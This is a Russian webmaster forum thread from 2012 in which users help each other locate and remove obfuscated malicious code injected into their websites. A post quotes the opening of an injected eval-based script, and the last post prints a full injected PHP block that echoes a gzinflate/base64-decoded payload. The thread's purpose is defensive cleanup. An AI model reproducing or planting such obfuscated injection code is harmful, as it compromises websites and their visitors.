Помощник
|
Вирус на сайте. |
geryon
|
Сообщение
#1
|
||
|
|
||
|
|||
OMGet |
31.7.2012, 11:01;
Ответить: OMGet
Сообщение
#2
|
|
вирус закодирован, перенаправляет смотря откуда пришел, чтобы не сразу спалила администрация, ищите в php файлах в закодированом виде,
Раскодировать можно тут |
|
|
kioto |
31.7.2012, 11:05;
Ответить: kioto
Сообщение
#3
|
|
Так вон же, в футере, перед тегом <body> три строки. Это оно и есть. Вероятнее всего будет в файлах html, js. Возможно, tpl, если используется Smarty.
-------------------- |
|
|
geryon
|
Сообщение
#4
|
|
В подвале убрал но все равно.
-------------------- |
|
|
kioto |
31.7.2012, 11:28;
Ответить: kioto
Сообщение
#5
|
|
Не убрали. Сами исходный код страницы посмотрите. Еще где-то есть.
-------------------- |
|
|
zdev1l1990 |
31.7.2012, 11:37;
Ответить: zdev1l1990
Сообщение
#6
|
|
помогите тоже определить где именно вирус?)
http://nerpc.ru хром ругается... -------------------- |
|
|
kioto |
31.7.2012, 11:42;
Ответить: kioto
Сообщение
#7
|
|
zdev1l1990,
самая первая строка, перед "<!DOCTYPE". Начинается: <script>try{eval("pro"+"totype")>0;}... Вообще, народ... Проверяете всегда следующее: 1. строки ПЕРЕД закрывающим тегом </body> 2. теги <script></script> 3. теги <iframe> 99% гадости цепляются именно сюда. Вычистите это - считайте, дело сделано. Наиболее часто атакуемые файлы: html/htm, js, php, tpl. Сообщение отредактировал kioto - 31.7.2012, 11:46 -------------------- |
|
|
geryon
|
Сообщение
#8
|
|
Ничего у меня не выходит
Сделаю бесплатно прогон(который в подписи) тому, кто поможет решить эту проблему. -------------------- |
|
|
kioto |
31.7.2012, 12:08;
Ответить: kioto
Сообщение
#9
|
|
Мне Вы уже делали прогон . Но все равно давайте гляну. Доступ от фтп в личку скиньте.
-------------------- |
|
|
zdev1l1990 |
31.7.2012, 12:12;
Ответить: zdev1l1990
Сообщение
#10
|
|
да видел... найти не мог в каком файле... думал может подскажет кто, у кого было подобное, ща нашел уже.
#c3284d# echo(gzinflate(base64_decode("hVTNbuMgEH4XpEq2rLpgBgxy6KWP0OOqhyjrbFC7cWRbq+1GffdlhhBotNVe0Gj8wfczk2yW3ex P6+M6v5/HX9u3ip3miTVsndb308jqRz587Lbr7lD9+b2rz6ND0HB0TIi+bQXnbWvxEEKE01iBZY9dgyXHrrUE0OE EAVhSg3caT0U1QEJLxElEKOAJYIXBe9gwvcSuJWYboB2hpLoCUISmpzgxQGYgEUF1eE0Z1NOFxwD1AoR b Cj8rHpBAlQhflUy6ATmhD75Vn3oK2cHoyysXnSL7y2FEAJDOnBuPWBKTxSXRWGuZDVLbWptDjLZEcVN9 y iB6oOy1QampR24oIUqQhmRvJqcAA0bOXunEebGgb+YW/RK4M5SCyhuRZZNT23fXyUYb8hNbnDFFVzos1H69D9bkiOA2ZpRYrEacg7Wl7phBIbDrE7IQaP+13cQfW QupUl+hlBx5jV26lV8F5CsTzHFzXsQNX9xSCteFp73+709Hoz6pcDdp2hJNkTrO2uX05teKtS2rh4Prh s UxNuynufKOD/fCqMZv+OCdaHx9fnU+AJbmeZ398Ue7n6efT4ft/DR9H6vjt9eXh8rfVYe6sXU9fPh9xUXnnBO8HqsldDYPl7+hvw=="))); #/c3284d# вот такого рода код нашел... закодирован просто был, что и осложнило поиск. -------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Странный трафик на сайте длительное время | 34 | TABAK | 9098 | Вчера, 23:38 автор: Arsenwenger |
|
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте | 37 | CryptoCLoud | 10822 | Вчера, 15:37 автор: CryptoCLoud |
|
Боты могут делать пушподписки на моём сайте? | 3 | Megaspryt | 964 | Вчера, 5:18 автор: Skyworker |
|
Быстрый и качественный обмен на сайте Baksman.org Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк |
53 | Baksman | 33836 | 23.4.2024, 11:29 автор: Baksman |
|
Алтуально ли заработок на сайте? Оцение пожалуйста идею |
10 | hitman20 | 1894 | 1.2.2024, 5:37 автор: Liudmila |
Текстовая версия | Сейчас: 25.4.2024, 10:34 |